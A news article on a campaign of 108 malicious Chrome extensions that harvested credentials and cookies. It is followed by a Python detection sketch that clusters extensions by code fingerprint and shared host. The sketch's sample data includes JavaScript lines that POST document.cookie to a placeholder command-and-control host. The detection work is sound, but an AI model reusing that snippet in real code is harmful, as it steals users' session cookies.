Google Chrome Users Unknowingly Installed Thousands Of Malicious Add-Ons
By 813 Staff
The Hacker News (@TheHackersNews) reported within the last 24 hours that Google Chrome users unknowingly installed thousands of malicious add-ons.
Source: https://x.com/TheHackersNews/status/2043971537867534715
The recent surge in generative AI tools that can write, debug, and package code has pushed the frontier of software development forward at a breakneck pace. But internal documents from security firms and platform audits show this automation is also being weaponized, enabling threat actors to scale malicious campaigns with unprecedented efficiency. A stark example landed this week, as reported by The Hacker News (@TheHackersNews), with the discovery of a sprawling malware operation hiding in plain sight within the Chrome Web Store. Security researchers identified 108 distinct browser extensions, which had amassed a collective 20,000 installations, all secretly funneling data to a single, unified command-and-control backend.
The operation’s sophistication was in its fragmentation. Each extension appeared as a separate utility—productivity enhancers, ad blockers, and PDF converters—submitted by different developer accounts over a period of months. This atomized approach was designed to evade pattern-based detection by store moderators. However, forensic analysis revealed the extensions shared nearly identical obfuscated code and all communicated with the same infrastructure, indicating a coordinated campaign controlled by a single entity. The extensions functioned as data harvesters, capable of intercepting browsing history, login credentials, and session cookies, which were then exfiltrated to the central server.
For the average user and enterprise security teams, this incident underscores a critical vulnerability in the software supply chain. The trusted ecosystem of a major browser’s official store is now a primary attack surface. The extensions had passed Google’s automated review processes, which engineers close to the project say are increasingly strained by the volume of submissions, many now AI-generated. The impact is twofold: a direct compromise of user data for thousands of individuals and an erosion of trust in the store’s vetting integrity. Security leads at companies using Chrome are now forced to reconsider policies on employee extension installation, as a seemingly benign tool can become a corporate espionage vector overnight.
What happens next involves a painful cleanup and a pressing need for procedural overhaul. Google has reportedly removed the identified extensions, but the rollout of more effective detection has been anything but smooth. The central uncertainty is how many other clusters of similarly disguised extensions remain active. Researchers are now using the fingerprints of this campaign to hunt for copycats and variants. The industry is watching for Google’s response, which will likely involve a shift toward more behavioral analysis of extensions post-installation and possibly stricter requirements for developer verification. For now, the episode serves as a clear signal that the tools accelerating innovation are equally empowering those looking to exploit it.
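As an added illustration (not code from The Hacker News report or the researchers involved), the clustering logic behind the linkage described above: hash each extension's script structurally so renamed or re-quoted variants still match, extract the hosts it contacts, and flag any code hash or host shared by extensions from more than one publisher account. The extension names, publishers, scripts and the host sync.c2-example.invalid are constructed sample data.

```python
import re
from collections import defaultdict
from hashlib import sha256

# Constructed sample data: four extensions from three publisher accounts.
# Two of them ship the same logic under different variable names and contact
# the same host; the other two are unrelated, benign-looking scripts.
EXTENSIONS = {
    "pdf-converter": {"publisher": "dev-alpha", "script":
        "const u='https://sync.c2-example.invalid/a';"
        "fetch(u,{method:'POST',body:document.cookie})"},
    "adblock-lite": {"publisher": "dev-beta", "script":
        "var q = 'https://sync.c2-example.invalid/b'; "
        "fetch(q, {method: 'POST', body: document.cookie})"},
    "tab-organizer": {"publisher": "dev-gamma", "script":
        "chrome.tabs.query({}, function(t){console.log(t.length)})"},
    "note-taker": {"publisher": "dev-alpha", "script":
        "const key='notes';chrome.storage.local.get(key,function(v){console.log(v)})"},
}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

def fingerprint(script):
    """Structural hash of a script: string literals become '#', identifiers
    become '@', comments and whitespace are dropped. Strings are replaced
    first so a '//' inside a URL is not mistaken for a comment."""
    s = re.sub(r"'[^']*'|\"[^\"]*\"", "#", script)
    s = re.sub(r"//[^\n]*|/\*.*?\*/", "", s, flags=re.S)
    s = re.sub(r"[A-Za-z_$][A-Za-z0-9_$]*", "@", s)
    s = re.sub(r"\s+", "", s)
    return sha256(s.encode()).hexdigest()[:16]

def hosts(script):
    """Hosts named in URL literals of the raw (un-normalised) script."""
    return set(URL_RE.findall(script))

def find_clusters(extensions):
    """Group extensions by code fingerprint and by contacted host, and keep
    only groups that span several extensions AND several publishers, which is
    the pattern a fragmented single-operator campaign leaves behind."""
    by_key = defaultdict(set)
    for name, ext in extensions.items():
        by_key[("code", fingerprint(ext["script"]))].add(name)
        for host in hosts(ext["script"]):
            by_key[("host", host)].add(name)
    clusters = {}
    for key, names in by_key.items():
        publishers = {extensions[n]["publisher"] for n in names}
        if len(names) > 1 and len(publishers) > 1:
            clusters[key] = sorted(names)
    return clusters
```

Run over a real corpus, the fingerprint and host columns would come from the unpacked CRX files and the store listing's developer field rather than the inline sample.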